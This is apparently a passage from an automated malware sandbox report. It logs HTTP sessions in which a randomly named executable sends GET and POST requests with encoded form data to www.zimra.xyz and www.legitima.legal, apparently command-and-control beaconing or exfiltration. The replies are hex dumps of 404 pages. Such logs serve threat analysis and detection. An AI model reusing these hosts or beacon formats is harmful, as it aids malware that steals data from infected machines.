                                                              Sep 11, 2024 22:56:57.952769995 CEST1236INHTTP/1.1 404 Not Found
                                                              Date: Wed, 11 Sep 2024 20:56:57 GMT
                                                              Server: Apache
                                                              Content-Length: 16052
                                                              Connection: close
                                                              Content-Type: text/html
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                              Sep 11, 2024 22:56:57.952805042 CEST1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                              Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                              Sep 11, 2024 22:56:57.952816963 CEST1236INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                              Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                              Sep 11, 2024 22:56:57.952856064 CEST1236INData Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                                              Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                                                              Sep 11, 2024 22:56:57.952867985 CEST1236INData Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32
                                                              Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
                                                              Sep 11, 2024 22:56:57.952881098 CEST1236INData Raw: 35 31 2c 31 2e 35 32 31 36 35 20 30 2e 32 32 32 39 39 2c 31 2e 30 36 35 37 39 20 30 2e 31 34 39 33 33 2c 30 2e 36 30 39 31 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c
                                                              Data Ascii: 51,1.52165 0.22299,1.06579 0.14933,0.60912" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4533" d=
                                                              Sep 11, 2024 22:56:57.952893972 CEST1236INData Raw: 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20
                                                              Data Ascii: ke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4541" d="m 85.206367,122.98266 c 0.117841,11.74369 0.235693,23.48835 0.235693,36.55072 -10e-7,13.06238 -0.117833,27.43796 -0.05891,45
                                                              Sep 11, 2024 22:56:57.952972889 CEST1000INData Raw: 2c 32 36 2e 37 30 30 33 33 20 2d 32 2e 32 39 38 33 39 34 2c 36 2e 39 35 33 36 32 20 2d 32 2e 32 39 38 33 39 34 2c 31 31 2e 35 34 39 32 32 20 2d 31 2e 33 35 35 34 31 39 2c 32 34 2e 35 37 34 31 35 20 30 2e 39 34 32 39 37 34 2c 31 33 2e 30 32 34 39
                                                              Data Ascii: ,26.70033 -2.298394,6.95362 -2.298394,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-w
                                                              Sep 11, 2024 22:56:57.952985048 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 31 33 2e 31 31 33 31 39 39 2c 31 39 38 2e 31 36 38 32 31 20 63 20 34 37 2e 35 34 37 30 33 38 2c 30 2e 34 30 33 36 31 20 39 35 2e 30 39 33 30 37 31 2c 30 2e 38 30 37 32 31 20 31 34 32 2e 36 33 38 31
                                                              Data Ascii: d="m 13.113199,198.16821 c 47.547038,0.40361 95.093071,0.80721 142.638101,1.2108" style="display:inline;fill:none;stroke:#000000;stroke-width:1.00614154px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" />
                                                              Sep 11, 2024 22:56:57.952996969 CEST792INData Raw: 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31 34 35 31 35 2c 2d 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 72 79 3d 22 33 2e 38 38 30 35 34 32 22 0a 20
                                                              Data Ascii: transform="translate(-170.14515,-0.038164)" ry="3.880542" rx="3.5777507" cy="164.5713" cx="321.42224" id="path4565" style="opacity:1;fill:#000000;fill-opac
                                                              Sep 11, 2024 22:56:57.959331036 CEST1236INData Raw: 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 30 30 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 34 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70
                                                              Data Ascii: 000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4570" d="m 325,163.45184 c 1.66722,0.6259


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              36192.168.2.759697162.0.213.94805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:56:59.893023968 CEST437OUTGET /knrh/?XvhP6L=YgggYvzCIY9cxyt1YCa2G3R12OneF5/58fBG84NSPGW4/awNicu/ZN4HtGSklex6REK8bsR/OR3Y+MJqd7/88rmQQgGzhJF4KytM6w66NwsLhFIcz78jdTwuasaid4VzQcobuCXl81HP&Xt7D=9p4tP8lp52ndpXM HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Host: www.zimra.xyz
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Sep 11, 2024 22:57:00.498545885 CEST1236INHTTP/1.1 404 Not Found
                                                              Date: Wed, 11 Sep 2024 20:57:00 GMT
                                                              Server: Apache
                                                              Content-Length: 16052
                                                              Connection: close
                                                              Content-Type: text/html; charset=utf-8
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                              Sep 11, 2024 22:57:00.498565912 CEST1236INData Raw: 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34
                                                              Data Ascii: /linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)"
                                                              Sep 11, 2024 22:57:00.498577118 CEST1236INData Raw: 37 39 20 2d 30 2e 35 39 35 32 33 33 2c 2d 31 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34
                                                              Data Ascii: 79 -0.595233,-18.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;str
                                                              Sep 11, 2024 22:57:00.498588085 CEST1236INData Raw: 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 30 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c
                                                              Data Ascii: width="100.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /
                                                              Sep 11, 2024 22:57:00.498600960 CEST1236INData Raw: 38 2e 36 36 36 33 31 20 31 2e 32 34 39 39 32 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32
                                                              Data Ascii: 8.66631 1.249922,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000
                                                              Sep 11, 2024 22:57:00.498887062 CEST1236INData Raw: 31 2c 38 2e 30 32 34 30 36 20 30 2e 32 39 36 35 31 2c 31 2e 35 32 31 36 35 20 30 2e 32 32 32 39 39 2c 31 2e 30 36 35 37 39 20 30 2e 31 34 39 33 33 2c 30 2e 36 30 39 31 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73
                                                              Data Ascii: 1,8.02406 0.29651,1.52165 0.22299,1.06579 0.14933,0.60912" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4533"
                                                              Sep 11, 2024 22:57:00.498898983 CEST1236INData Raw: 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20
                                                              Data Ascii: -width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4541" d="m 85.206367,122.98266 c 0.117841,11.74369 0.235693,23.48835 0.235693,36.55072 -10e-7,13.06238 -0.117833,27.43
                                                              Sep 11, 2024 22:57:00.498910904 CEST108INData Raw: 34 36 37 32 20 2d 31 31 2e 39 31 32 38 30 38 2c 32 36 2e 37 30 30 33 33 20 2d 32 2e 32 39 38 33 39 34 2c 36 2e 39 35 33 36 32 20 2d 32 2e 32 39 38 33 39 34 2c 31 31 2e 35 34 39 32 32 20 2d 31 2e 33 35 35 34 31 39 2c 32 34 2e 35 37 34 31 35 20 30
                                                              Data Ascii: 4672 -11.912808,26.70033 -2.298394,6.95362 -2.298394,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,
                                                              Sep 11, 2024 22:57:00.498920918 CEST1236INData Raw: 33 34 2e 34 36 39 31 37 20 35 2e 30 36 36 30 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a
                                                              Data Ascii: 34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path
                                                              Sep 11, 2024 22:57:00.498934031 CEST1236INData Raw: 32 38 39 2c 31 38 2e 34 31 35 35 20 2d 38 2e 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66
                                                              Data Ascii: 289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717"
                                                              Sep 11, 2024 22:57:00.506315947 CEST1236INData Raw: 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74
                                                              Data Ascii: oke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567" d="m 321.74355,168.0687 c -1e-5,3.3913 -3.42414,11.26702 -8.73834,11.26702 -5.3142,0 -18.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              37192.168.2.75969884.32.84.32805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:57:05.704714060 CEST702OUTPOST /7fgk/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.legitima.legal
                                                              Origin: http://www.legitima.legal
                                                              Cache-Control: max-age=0
                                                              Content-Length: 219
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.legitima.legal/7fgk/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Raw: 58 76 68 50 36 4c 3d 75 75 67 56 30 36 39 33 47 4b 64 54 32 35 52 53 54 42 79 6c 53 47 62 6b 63 33 45 6e 59 37 54 50 79 75 48 32 51 6b 4b 6d 4a 51 66 6c 4f 4d 6e 6f 76 6c 38 42 49 38 77 48 65 44 2b 4a 64 59 62 6c 6d 70 51 42 69 32 4a 78 71 44 50 47 57 76 70 44 6c 75 75 4e 7a 5a 56 6f 4c 38 6e 53 5a 6e 31 31 6b 66 62 43 50 49 31 4f 73 50 33 64 4d 4d 76 73 42 45 4e 5a 76 2b 32 6a 30 70 38 44 6f 52 33 4a 4b 79 59 53 6b 73 30 33 57 50 71 52 46 6e 33 4e 69 30 37 54 6b 34 31 68 41 7a 6c 68 33 44 2b 55 6a 33 7a 6d 6c 42 76 6c 61 2f 6f 6c 58 65 6a 43 43 4a 75 45 72 70 55 70 62 61 59 56 4d 50 2f 71 78 46 51 46 61 32 53 35 52 54 6b 76 48 51 4f 31 66 67 3d 3d
                                                              Data Ascii: XvhP6L=uugV0693GKdT25RSTBylSGbkc3EnY7TPyuH2QkKmJQflOMnovl8BI8wHeD+JdYblmpQBi2JxqDPGWvpDluuNzZVoL8nSZn11kfbCPI1OsP3dMMvsBENZv+2j0p8DoR3JKyYSks03WPqRFn3Ni07Tk41hAzlh3D+Uj3zmlBvla/olXejCCJuErpUpbaYVMP/qxFQFa2S5RTkvHQO1fg==


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              38192.168.2.75969984.32.84.32805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:57:08.384095907 CEST722OUTPOST /7fgk/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.legitima.legal
                                                              Origin: http://www.legitima.legal
                                                              Cache-Control: max-age=0
                                                              Content-Length: 239
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.legitima.legal/7fgk/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Raw: 58 76 68 50 36 4c 3d 75 75 67 56 30 36 39 33 47 4b 64 54 33 64 56 53 53 6d 75 6c 55 6d 62 6c 43 6e 45 6e 42 4c 54 78 79 75 44 32 51 6c 2b 32 4a 69 4c 6c 41 49 72 6f 73 68 49 42 46 63 77 48 57 6a 2b 4d 54 34 62 69 6d 70 63 4a 69 7a 4a 78 71 44 4c 47 57 75 5a 44 6d 5a 79 4f 78 4a 56 71 65 4d 6e 51 64 6e 31 31 6b 66 62 43 50 49 51 70 73 50 50 64 4e 38 66 73 42 67 35 61 70 4f 32 67 6a 5a 38 44 35 42 33 4e 4b 79 59 38 6b 74 5a 59 57 4e 53 52 46 6d 48 4e 68 6d 44 55 75 34 31 34 45 7a 6b 50 78 79 48 68 6f 7a 33 61 74 58 6e 57 44 50 6b 62 62 49 2b 67 59 72 69 6f 31 34 73 53 66 59 38 6a 62 70 69 66 7a 45 55 64 58 55 6d 59 4f 6b 42 46 4b 43 76 78 4a 58 66 70 48 51 7a 79 56 48 56 5a 49 64 2b 47 4b 44 36 70 4d 6b 30 3d
                                                              Data Ascii: XvhP6L=uugV0693GKdT3dVSSmulUmblCnEnBLTxyuD2Ql+2JiLlAIroshIBFcwHWj+MT4bimpcJizJxqDLGWuZDmZyOxJVqeMnQdn11kfbCPIQpsPPdN8fsBg5apO2gjZ8D5B3NKyY8ktZYWNSRFmHNhmDUu414EzkPxyHhoz3atXnWDPkbbI+gYrio14sSfY8jbpifzEUdXUmYOkBFKCvxJXfpHQzyVHVZId+GKD6pMk0=


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              39192.168.2.75970084.32.84.32805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:57:10.929728985 CEST1735OUTPOST /7fgk/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.legitima.legal
                                                              Origin: http://www.legitima.legal
                                                              Cache-Control: max-age=0
                                                              Content-Length: 1251
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.legitima.legal/7fgk/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Raw: 58 76 68 50 36 4c 3d 75 75 67 56 30 36 39 33 47 4b 64 54 33 64 56 53 53 6d 75 6c 55 6d 62 6c 43 6e 45 6e 42 4c 54 78 79 75 44 32 51 6c 2b 32 4a 69 7a 6c 41 37 6a 6f 76 41 49 42 45 63 77 48 4a 54 2b 4e 54 34 62 7a 6d 71 73 4e 69 7a 31 4c 71 41 2f 47 51 34 4e 44 75 49 79 4f 34 4a 56 71 42 63 6e 4e 5a 6e 31 61 6b 66 4c 47 50 49 67 70 73 50 50 64 4e 2f 48 73 52 6b 4e 61 79 4f 32 6a 30 70 38 48 6f 52 33 6c 4b 79 41 4b 6b 74 74 79 57 2b 61 52 46 46 2f 4e 6b 56 37 55 6d 34 31 74 4a 54 6b 68 78 7a 37 49 6f 79 66 34 74 58 37 76 44 49 67 62 59 50 58 43 48 49 57 51 6e 36 35 4c 62 70 77 79 57 35 72 6a 31 32 51 69 51 6a 65 4e 53 6a 63 2f 43 67 48 65 46 69 6a 70 63 69 66 69 61 33 38 4a 46 4b 48 66 64 68 36 6c 52 53 34 53 36 4c 4b 48 49 63 53 69 46 34 52 48 49 46 69 44 65 47 62 52 31 41 7a 76 2f 61 43 68 2f 38 66 31 52 49 66 6a 77 43 75 31 39 6a 78 63 75 43 7a 76 4d 44 68 4e 5a 69 4f 2f 32 45 63 4c 62 47 78 67 2f 75 4d 62 52 38 35 31 48 30 42 63 4e 39 33 52 71 65 70 72 6b 75 71 5a 46 50 38 7a 34 79 72 72 49 54 54 [TRUNCATED]
                                                              Data Ascii: XvhP6L=uugV0693GKdT3dVSSmulUmblCnEnBLTxyuD2Ql+2JizlA7jovAIBEcwHJT+NT4bzmqsNiz1LqA/GQ4NDuIyO4JVqBcnNZn1akfLGPIgpsPPdN/HsRkNayO2j0p8HoR3lKyAKkttyW+aRFF/NkV7Um41tJTkhxz7Ioyf4tX7vDIgbYPXCHIWQn65LbpwyW5rj12QiQjeNSjc/CgHeFijpcifia38JFKHfdh6lRS4S6LKHIcSiF4RHIFiDeGbR1Azv/aCh/8f1RIfjwCu19jxcuCzvMDhNZiO/2EcLbGxg/uMbR851H0BcN93RqeprkuqZFP8z4yrrITTc1HmZwCh1Ntxm+BdHfjFN3DnyH5epYMQvEzcIdspPsvhbHL4WSz+ELnwJatnye7bn56zsERmCQvAaYZAB27/k8qV1mttd+cEOo0FGzoh80W73akOAnp+4CbSp6nILWpWaQQ+hhhOInrAUr75Tt1+6JQU3fft/iKT8RUVLkl2P9aOjzhx9SSrQEDN6K2ryPlJR/IASaMjqmMzszJC2gRcjChKlU4dygHWJnkr2JYckqmXyxAPfr3eyIKEDocgpTncR2yqsyzrP7zoPm6b3T9GU6npJ3uskXNRJQwphZFN0vK467Hs2b5GFil8YYLIhMpF/yz6quViz4J0haIbOTDJyesW69d3FoIJNhOYGXBfBN00bTBgC/QrduKjts20nMcFHa73ISiiJ1Y1MarxaLn4X6XrcD6v05mmusdTdWUn08sOkBeu6SZyEOIylvcZDK/wIBizbj6yGzH2TV9Z0tPMRfvQ9mrKILjSw3C/mfp1qLY320ojvZdg56x5GrdEa1N7pwqntB3fJ6/t3J0NSpWd+paaqbghoXnZ48ogKc4s0B/dIQyHEPhj9cFdxUlchayCm9OEFRDsQqaDBZAzeIXeoJ/yaRFTPWwJ9ITHWpvOMdk0lO/w7BASov2NUgUM3GGWKvxBxzAnrVlHDsPI6gOwuKSqmERp52DgRC [TRUNCATED]


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              40192.168.2.75970184.32.84.32805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
